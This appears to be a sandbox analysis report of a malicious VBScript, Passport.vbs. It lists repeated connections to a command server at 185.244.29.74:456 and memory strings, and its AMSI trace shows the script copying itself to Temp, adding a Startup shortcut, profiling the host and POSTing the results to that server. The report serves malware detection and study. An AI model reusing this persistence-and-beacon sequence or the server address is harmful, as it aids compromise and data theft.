Source: unknown | Network traffic detected: HTTP traffic on port 49706 -> 456 |
Source: unknown | Network traffic detected: HTTP traffic on port 456 -> 49706 |
Source: unknown | Network traffic detected: HTTP traffic on port 49709 -> 456 |
Source: unknown | Network traffic detected: HTTP traffic on port 456 -> 49709 |
Source: unknown | Network traffic detected: HTTP traffic on port 49716 -> 456 |
Source: unknown | Network traffic detected: HTTP traffic on port 456 -> 49716 |
Source: unknown | Network traffic detected: HTTP traffic on port 49717 -> 456 |
Source: unknown | Network traffic detected: HTTP traffic on port 456 -> 49717 |
Source: unknown | Network traffic detected: HTTP traffic on port 49719 -> 456 |
Source: unknown | Network traffic detected: HTTP traffic on port 456 -> 49719 |
Source: unknown | Network traffic detected: HTTP traffic on port 49720 -> 456 |
Source: unknown | Network traffic detected: HTTP traffic on port 456 -> 49720 |
Source: unknown | Network traffic detected: HTTP traffic on port 49721 -> 456 |
Source: unknown | Network traffic detected: HTTP traffic on port 456 -> 49721 |
Source: unknown | Network traffic detected: HTTP traffic on port 49722 -> 456 |
Source: unknown | Network traffic detected: HTTP traffic on port 456 -> 49722 |
Source: unknown | Network traffic detected: HTTP traffic on port 49723 -> 456 |
Source: unknown | Network traffic detected: HTTP traffic on port 456 -> 49723 |
Source: unknown | Network traffic detected: HTTP traffic on port 49724 -> 456 |
Source: unknown | Network traffic detected: HTTP traffic on port 456 -> 49724 |
Source: unknown | Network traffic detected: HTTP traffic on port 49725 -> 456 |
Source: unknown | Network traffic detected: HTTP traffic on port 456 -> 49725 |
Source: unknown | Network traffic detected: HTTP traffic on port 49726 -> 456 |
Source: unknown | Network traffic detected: HTTP traffic on port 456 -> 49726 |
Source: unknown | Network traffic detected: HTTP traffic on port 49727 -> 456 |
Source: unknown | Network traffic detected: HTTP traffic on port 456 -> 49727 |
Source: unknown | Network traffic detected: HTTP traffic on port 49728 -> 456 |
Source: unknown | Network traffic detected: HTTP traffic on port 456 -> 49728 |
Source: unknown | Network traffic detected: HTTP traffic on port 49729 -> 456 |
Source: unknown | Network traffic detected: HTTP traffic on port 456 -> 49729 |
Source: unknown | Network traffic detected: HTTP traffic on port 49730 -> 456 |
Source: unknown | Network traffic detected: HTTP traffic on port 456 -> 49730 |
Source: unknown | TCP traffic detected without corresponding DNS query: 185.244.29.74 |
Source: unknown | TCP traffic detected without corresponding DNS query: 185.244.29.74 |
Source: unknown | TCP traffic detected without corresponding DNS query: 185.244.29.74 |
Source: unknown | TCP traffic detected without corresponding DNS query: 185.244.29.74 |
Source: unknown | TCP traffic detected without corresponding DNS query: 185.244.29.74 |
Source: unknown | TCP traffic detected without corresponding DNS query: 185.244.29.74 |
Source: unknown | TCP traffic detected without corresponding DNS query: 185.244.29.74 |
Source: unknown | TCP traffic detected without corresponding DNS query: 185.244.29.74 |
Source: unknown | TCP traffic detected without corresponding DNS query: 185.244.29.74 |
Source: unknown | TCP traffic detected without corresponding DNS query: 185.244.29.74 |
Source: unknown | TCP traffic detected without corresponding DNS query: 185.244.29.74 |
Source: unknown | TCP traffic detected without corresponding DNS query: 185.244.29.74 |
Source: unknown | TCP traffic detected without corresponding DNS query: 185.244.29.74 |
Source: unknown | TCP traffic detected without corresponding DNS query: 185.244.29.74 |
Source: unknown | TCP traffic detected without corresponding DNS query: 185.244.29.74 |
Source: unknown | TCP traffic detected without corresponding DNS query: 185.244.29.74 |
Source: unknown | TCP traffic detected without corresponding DNS query: 185.244.29.74 |
Source: unknown | TCP traffic detected without corresponding DNS query: 185.244.29.74 |
Source: unknown | TCP traffic detected without corresponding DNS query: 185.244.29.74 |
Source: unknown | TCP traffic detected without corresponding DNS query: 185.244.29.74 |
Source: unknown | TCP traffic detected without corresponding DNS query: 185.244.29.74 |
Source: unknown | TCP traffic detected without corresponding DNS query: 185.244.29.74 |
Source: unknown | TCP traffic detected without corresponding DNS query: 185.244.29.74 |
Source: unknown | TCP traffic detected without corresponding DNS query: 185.244.29.74 |
Source: unknown | TCP traffic detected without corresponding DNS query: 185.244.29.74 |
Source: unknown | TCP traffic detected without corresponding DNS query: 185.244.29.74 |
Source: unknown | TCP traffic detected without corresponding DNS query: 185.244.29.74 |
Source: unknown | TCP traffic detected without corresponding DNS query: 185.244.29.74 |
Source: unknown | TCP traffic detected without corresponding DNS query: 185.244.29.74 |
Source: unknown | TCP traffic detected without corresponding DNS query: 185.244.29.74 |
Source: unknown | TCP traffic detected without corresponding DNS query: 185.244.29.74 |
Source: unknown | TCP traffic detected without corresponding DNS query: 185.244.29.74 |
Source: unknown | TCP traffic detected without corresponding DNS query: 185.244.29.74 |
Source: unknown | TCP traffic detected without corresponding DNS query: 185.244.29.74 |
Source: unknown | TCP traffic detected without corresponding DNS query: 185.244.29.74 |
Source: unknown | TCP traffic detected without corresponding DNS query: 185.244.29.74 |
Source: unknown | TCP traffic detected without corresponding DNS query: 185.244.29.74 |
Source: unknown | TCP traffic detected without corresponding DNS query: 185.244.29.74 |
Source: unknown | TCP traffic detected without corresponding DNS query: 185.244.29.74 |
Source: unknown | TCP traffic detected without corresponding DNS query: 185.244.29.74 |
Source: unknown | TCP traffic detected without corresponding DNS query: 185.244.29.74 |
Source: unknown | TCP traffic detected without corresponding DNS query: 185.244.29.74 |
Source: unknown | TCP traffic detected without corresponding DNS query: 185.244.29.74 |
Source: unknown | TCP traffic detected without corresponding DNS query: 185.244.29.74 |
Source: unknown | TCP traffic detected without corresponding DNS query: 185.244.29.74 |
Source: unknown | TCP traffic detected without corresponding DNS query: 185.244.29.74 |
Source: unknown | TCP traffic detected without corresponding DNS query: 185.244.29.74 |
Source: unknown | TCP traffic detected without corresponding DNS query: 185.244.29.74 |
Source: unknown | TCP traffic detected without corresponding DNS query: 185.244.29.74 |
Source: unknown | TCP traffic detected without corresponding DNS query: 185.244.29.74 |
Source: wscript.exe, 00000000.00000002.4526205993.000001F24575F000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://185.244.29.74/ |
Source: wscript.exe, 00000002.00000002.4526103258.00000282CCFB1000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://185.244.29.74/d1 |
Source: wscript.exe, 00000000.00000002.4526205993.000001F24575F000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://185.244.29.74/j |
Source: wscript.exe, 00000002.00000003.2155784496.00000282CCBCA000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000002.00000003.2155696546.00000282CCBC3000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000002.00000002.4526519100.00000282CD045000.00000004.00000020.00020000.00000000.sdmp, Passport.vbs, Passport.vbs.0.dr | String found in binary or memory: http://185.244.29.74:456/document |
Source: wscript.exe, 00000002.00000002.4526103258.00000282CCFB1000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://185.244.29.74:456/document& |
Source: wscript.exe, 00000000.00000002.4526205993.000001F24573D000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://185.244.29.74:456/document32 |
Source: wscript.exe, 00000000.00000002.4526205993.000001F24573D000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://185.244.29.74:456/documentB |
Source: wscript.exe, 00000002.00000002.4526103258.00000282CCFB1000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://185.244.29.74:456/documentG |
Source: wscript.exe, 00000002.00000002.4526103258.00000282CCF88000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://185.244.29.74:456/documentJ |
Source: wscript.exe, 00000002.00000002.4526103258.00000282CCF88000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://185.244.29.74:456/documentT |
Source: wscript.exe, 00000000.00000002.4526205993.000001F24573D000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://185.244.29.74:456/documentX |
Source: wscript.exe, 00000000.00000002.4526205993.000001F24573D000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://185.244.29.74:456/document_ |
Source: wscript.exe, 00000002.00000002.4526103258.00000282CCF88000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://185.244.29.74:456/documentage: |
Source: wscript.exe, 00000000.00000002.4526205993.000001F2456DE000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://185.244.29.74:456/documentgE |
Source: wscript.exe, 00000000.00000002.4526205993.000001F2456DE000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://185.244.29.74:456/documentnE |
Source: wscript.exe, 00000000.00000002.4526169180.000001F245675000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://185.244.29.74:456/documentq |
Source: wscript.exe, 00000000.00000002.4526169180.000001F245675000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://185.244.29.74:456/documentr |
Source: wscript.exe, 00000000.00000002.4526205993.000001F2456DE000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000002.00000002.4526103258.00000282CCF46000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://ipinfo.io/ |
Source: wscript.exe, 00000002.00000003.2155784496.00000282CCBCA000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000002.00000002.4526519100.00000282CD045000.00000004.00000020.00020000.00000000.sdmp, Passport.vbs, Passport.vbs.0.dr | String found in binary or memory: https://ipinfo.io/country |
Source: wscript.exe, 00000000.00000002.4526205993.000001F2456BC000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://ipinfo.io/country6% |
Source: wscript.exe, 00000002.00000002.4526103258.00000282CCF88000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://ipinfo.io/countryS |
Source: wscript.exe, 00000002.00000002.4526103258.00000282CCF88000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://ipinfo.io/countryW |
Source: wscript.exe, 00000002.00000002.4526103258.00000282CCF03000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://ipinfo.io/countryY: |
Source: wscript.exe, 00000000.00000003.2029110505.000001F2438FA000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000002.00000003.2155769312.00000282CAFDA000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://ipinfo.io/country_ |
Source: wscript.exe, 00000000.00000002.4526169180.000001F245675000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://ipinfo.io/countryq |
Source: wscript.exe, 00000000.00000002.4526205993.000001F2456BC000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://ipinfo.io/countryz% |
Source: wscript.exe, 00000002.00000003.2155784496.00000282CCBCA000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000002.00000002.4526519100.00000282CD045000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000002.00000002.4525760224.00000282CADAD000.00000004.00000020.00020000.00000000.sdmp, Passport.vbs, Passport.vbs.0.dr | String found in binary or memory: https://ipinfo.io/org |
Source: wscript.exe, 00000000.00000003.2029110505.000001F2438FA000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000002.00000003.2155769312.00000282CAFDA000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://ipinfo.io/org_ |
Source: wscript.exe, 00000000.00000002.4526205993.000001F2456DE000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000002.00000002.4526103258.00000282CCF88000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://login.live.com |
Source: C:\Windows\System32\wscript.exe | Section loaded: version.dll | Jump to behavior |
Source: C:\Windows\System32\wscript.exe | Section loaded: kernel.appcore.dll | Jump to behavior |
Source: C:\Windows\System32\wscript.exe | Section loaded: uxtheme.dll | Jump to behavior |
Source: C:\Windows\System32\wscript.exe | Section loaded: sxs.dll | Jump to behavior |
Source: C:\Windows\System32\wscript.exe | Section loaded: vbscript.dll | Jump to behavior |
Source: C:\Windows\System32\wscript.exe | Section loaded: amsi.dll | Jump to behavior |
Source: C:\Windows\System32\wscript.exe | Section loaded: userenv.dll | Jump to behavior |
Source: C:\Windows\System32\wscript.exe | Section loaded: profapi.dll | Jump to behavior |
Source: C:\Windows\System32\wscript.exe | Section loaded: wldp.dll | Jump to behavior |
Source: C:\Windows\System32\wscript.exe | Section loaded: msasn1.dll | Jump to behavior |
Source: C:\Windows\System32\wscript.exe | Section loaded: cryptsp.dll | Jump to behavior |
Source: C:\Windows\System32\wscript.exe | Section loaded: rsaenh.dll | Jump to behavior |
Source: C:\Windows\System32\wscript.exe | Section loaded: cryptbase.dll | Jump to behavior |
Source: C:\Windows\System32\wscript.exe | Section loaded: msisip.dll | Jump to behavior |
Source: C:\Windows\System32\wscript.exe | Section loaded: wshext.dll | Jump to behavior |
Source: C:\Windows\System32\wscript.exe | Section loaded: scrobj.dll | Jump to behavior |
Source: C:\Windows\System32\wscript.exe | Section loaded: wbemcomn.dll | Jump to behavior |
Source: C:\Windows\System32\wscript.exe | Section loaded: scrrun.dll | Jump to behavior |
Source: C:\Windows\System32\wscript.exe | Section loaded: mpr.dll | Jump to behavior |
Source: C:\Windows\System32\wscript.exe | Section loaded: ntmarta.dll | Jump to behavior |
Source: C:\Windows\System32\wscript.exe | Section loaded: windows.storage.dll | Jump to behavior |
Source: C:\Windows\System32\wscript.exe | Section loaded: propsys.dll | Jump to behavior |
Source: C:\Windows\System32\wscript.exe | Section loaded: linkinfo.dll | Jump to behavior |
Source: C:\Windows\System32\wscript.exe | Section loaded: ntshrui.dll | Jump to behavior |
Source: C:\Windows\System32\wscript.exe | Section loaded: sspicli.dll | Jump to behavior |
Source: C:\Windows\System32\wscript.exe | Section loaded: srvcli.dll | Jump to behavior |
Source: C:\Windows\System32\wscript.exe | Section loaded: cscapi.dll | Jump to behavior |
Source: C:\Windows\System32\wscript.exe | Section loaded: msxml3.dll | Jump to behavior |
Source: C:\Windows\System32\wscript.exe | Section loaded: wininet.dll | Jump to behavior |
Source: C:\Windows\System32\wscript.exe | Section loaded: iertutil.dll | Jump to behavior |
Source: C:\Windows\System32\wscript.exe | Section loaded: mlang.dll | Jump to behavior |
Source: C:\Windows\System32\wscript.exe | Section loaded: urlmon.dll | Jump to behavior |
Source: C:\Windows\System32\wscript.exe | Section loaded: netutils.dll | Jump to behavior |
Source: C:\Windows\System32\wscript.exe | Section loaded: ondemandconnroutehelper.dll | Jump to behavior |
Source: C:\Windows\System32\wscript.exe | Section loaded: winhttp.dll | Jump to behavior |
Source: C:\Windows\System32\wscript.exe | Section loaded: mswsock.dll | Jump to behavior |
Source: C:\Windows\System32\wscript.exe | Section loaded: iphlpapi.dll | Jump to behavior |
Source: C:\Windows\System32\wscript.exe | Section loaded: winnsi.dll | Jump to behavior |
Source: C:\Windows\System32\wscript.exe | Section loaded: dnsapi.dll | Jump to behavior |
Source: C:\Windows\System32\wscript.exe | Section loaded: rasadhlp.dll | Jump to behavior |
Source: C:\Windows\System32\wscript.exe | Section loaded: fwpuclnt.dll | Jump to behavior |
Source: C:\Windows\System32\wscript.exe | Section loaded: schannel.dll | Jump to behavior |
Source: C:\Windows\System32\wscript.exe | Section loaded: mskeyprotect.dll | Jump to behavior |
Source: C:\Windows\System32\wscript.exe | Section loaded: ntasn1.dll | Jump to behavior |
Source: C:\Windows\System32\wscript.exe | Section loaded: dpapi.dll | Jump to behavior |
Source: C:\Windows\System32\wscript.exe | Section loaded: gpapi.dll | Jump to behavior |
Source: C:\Windows\System32\wscript.exe | Section loaded: ncrypt.dll | Jump to behavior |
Source: C:\Windows\System32\wscript.exe | Section loaded: ncryptsslp.dll | Jump to behavior |
Source: C:\Windows\System32\wscript.exe | Section loaded: version.dll | Jump to behavior |
Source: C:\Windows\System32\wscript.exe | Section loaded: kernel.appcore.dll | Jump to behavior |
Source: C:\Windows\System32\wscript.exe | Section loaded: uxtheme.dll | Jump to behavior |
Source: C:\Windows\System32\wscript.exe | Section loaded: sxs.dll | Jump to behavior |
Source: C:\Windows\System32\wscript.exe | Section loaded: vbscript.dll | Jump to behavior |
Source: C:\Windows\System32\wscript.exe | Section loaded: amsi.dll | Jump to behavior |
Source: C:\Windows\System32\wscript.exe | Section loaded: userenv.dll | Jump to behavior |
Source: C:\Windows\System32\wscript.exe | Section loaded: profapi.dll | Jump to behavior |
Source: C:\Windows\System32\wscript.exe | Section loaded: wldp.dll | Jump to behavior |
Source: C:\Windows\System32\wscript.exe | Section loaded: msasn1.dll | Jump to behavior |
Source: C:\Windows\System32\wscript.exe | Section loaded: cryptsp.dll | Jump to behavior |
Source: C:\Windows\System32\wscript.exe | Section loaded: rsaenh.dll | Jump to behavior |
Source: C:\Windows\System32\wscript.exe | Section loaded: cryptbase.dll | Jump to behavior |
Source: C:\Windows\System32\wscript.exe | Section loaded: msisip.dll | Jump to behavior |
Source: C:\Windows\System32\wscript.exe | Section loaded: wshext.dll | Jump to behavior |
Source: C:\Windows\System32\wscript.exe | Section loaded: scrobj.dll | Jump to behavior |
Source: C:\Windows\System32\wscript.exe | Section loaded: wbemcomn.dll | Jump to behavior |
Source: C:\Windows\System32\wscript.exe | Section loaded: scrrun.dll | Jump to behavior |
Source: C:\Windows\System32\wscript.exe | Section loaded: mpr.dll | Jump to behavior |
Source: C:\Windows\System32\wscript.exe | Section loaded: windows.storage.dll | Jump to behavior |
Source: C:\Windows\System32\wscript.exe | Section loaded: propsys.dll | Jump to behavior |
Source: C:\Windows\System32\wscript.exe | Section loaded: linkinfo.dll | Jump to behavior |
Source: C:\Windows\System32\wscript.exe | Section loaded: msxml3.dll | Jump to behavior |
Source: C:\Windows\System32\wscript.exe | Section loaded: wininet.dll | Jump to behavior |
Source: C:\Windows\System32\wscript.exe | Section loaded: iertutil.dll | Jump to behavior |
Source: C:\Windows\System32\wscript.exe | Section loaded: mlang.dll | Jump to behavior |
Source: C:\Windows\System32\wscript.exe | Section loaded: urlmon.dll | Jump to behavior |
Source: C:\Windows\System32\wscript.exe | Section loaded: srvcli.dll | Jump to behavior |
Source: C:\Windows\System32\wscript.exe | Section loaded: netutils.dll | Jump to behavior |
Source: C:\Windows\System32\wscript.exe | Section loaded: sspicli.dll | Jump to behavior |
Source: C:\Windows\System32\wscript.exe | Section loaded: ondemandconnroutehelper.dll | Jump to behavior |
Source: C:\Windows\System32\wscript.exe | Section loaded: winhttp.dll | Jump to behavior |
Source: C:\Windows\System32\wscript.exe | Section loaded: mswsock.dll | Jump to behavior |
Source: C:\Windows\System32\wscript.exe | Section loaded: iphlpapi.dll | Jump to behavior |
Source: C:\Windows\System32\wscript.exe | Section loaded: winnsi.dll | Jump to behavior |
Source: C:\Windows\System32\wscript.exe | Section loaded: dpapi.dll | Jump to behavior |
Source: C:\Windows\System32\wscript.exe | Section loaded: gpapi.dll | Jump to behavior |
Source: C:\Windows\System32\wscript.exe | Section loaded: dnsapi.dll | Jump to behavior |
Source: C:\Windows\System32\wscript.exe | Section loaded: rasadhlp.dll | Jump to behavior |
Source: C:\Windows\System32\wscript.exe | Section loaded: fwpuclnt.dll | Jump to behavior |
Source: C:\Windows\System32\wscript.exe | Section loaded: schannel.dll | Jump to behavior |
Source: C:\Windows\System32\wscript.exe | Section loaded: mskeyprotect.dll | Jump to behavior |
Source: C:\Windows\System32\wscript.exe | Section loaded: ntasn1.dll | Jump to behavior |
Source: C:\Windows\System32\wscript.exe | Section loaded: ncrypt.dll | Jump to behavior |
Source: C:\Windows\System32\wscript.exe | Section loaded: ncryptsslp.dll | Jump to behavior |
Source: C:\Windows\System32\wscript.exe | Anti Malware Scan Interface: responseText();IServerXMLHTTPRequest2.open("GET", "https://ipinfo.io/org", "false");IServerXMLHTTPRequest2.send();IHost.FullName();ISWbemServicesEx.ExecQuery("Select * from Win32_ComputerSystem", "Unsupported parameter type 0000000a", "48");ISWbemObjectSet._NewEnum();ISWbemObjectEx._01800001();IWshShell3.ExpandEnvironmentStrings("%TEMP%");IHost.ScriptFullName();IFileSystem3.GetFileName("C:\Users\user\Desktop\Passport.vbs");IFileSystem3.BuildPath("C:\Users\user\AppData\Local\Temp", "Passport.vbs");IFileSystem3.FileExists("C:\Users\user\AppData\Local\Temp\Passport.vbs");IFileSystem3.CopyFile("C:\Users\user\Desktop\Passport.vbs", "C:\Users\user\AppData\Local\Temp\Passport.vbs");IWshShell3.SpecialFolders("Startup");IFileSystem3.BuildPath("C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup", "pesuti.lnk");IWshShell3.CreateShortcut("C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\pesuti.lnk");IWshShortcut.TargetPath("C:\Users\user\AppData\Local\Temp\Passport.vbs");IWshShortcut.WorkingDirectory("C:\Users\user\AppData\Local\Temp");IWshShortcut.Save();IServerXMLHTTPRequest2.open("GET", "https://ipinfo.io/country", "false");IServerXMLHTTPRequest2.send();IServerXMLHTTPRequest2.responseText();IServerXMLHTTPRequest2.open("GET", "https://ipinfo.io/org", "false");IServerXMLHTTPRequest2.send();IServerXMLHTTPRequest2.responseText();IHost.CreateObject("wscript.shell");IWshShell3.ExpandEnvironmentStrings("%SYSTEMDRIVE%");ISWbemServicesEx.ExecQuery("SELECT * FROM Win32_LogicalDisk WHERE DeviceId='C:'");ISWbemObjectSet._NewEnum();ISWbemObjectEx._01800001();IServerXMLHTTPRequest2.open("POST", "http://185.244.29.74:456/document", "false");IServerXMLHTTPRequest2.setRequestHeader("User-Agent", "B81A4609");IServerXMLHTTPRequest2.send();IHost.FullName();ISWbemServicesEx.ExecQuery("Select * from Win32_ComputerSystem", "Unsupported parameter type 0000000a", "48");ISWbemObjectSet._NewEnum();ISWbemObjectEx._01800001();IWshShell3.ExpandEnvironmentStrings("%TEMP%");IHost.ScriptFullName();IFileSystem3.GetFileName("C:\Users\user\Desktop\Passport.vbs");IFileSystem3.BuildPath("C:\Users\user\AppData\Local\Temp", "Passport.vbs");IFileSystem3.FileExists("C:\Users\user\AppData\Local\Temp\Passport.vbs");IFileSystem3.CopyFile("C:\Users\user\Desktop\Passport.vbs", "C:\Users\user\AppData\Local\Temp\Passport.vbs");IWshShell3.SpecialFolders("Startup");IFileSystem3.BuildPath("C:\Users\user\AppData\Roaming\Microsoft\Window |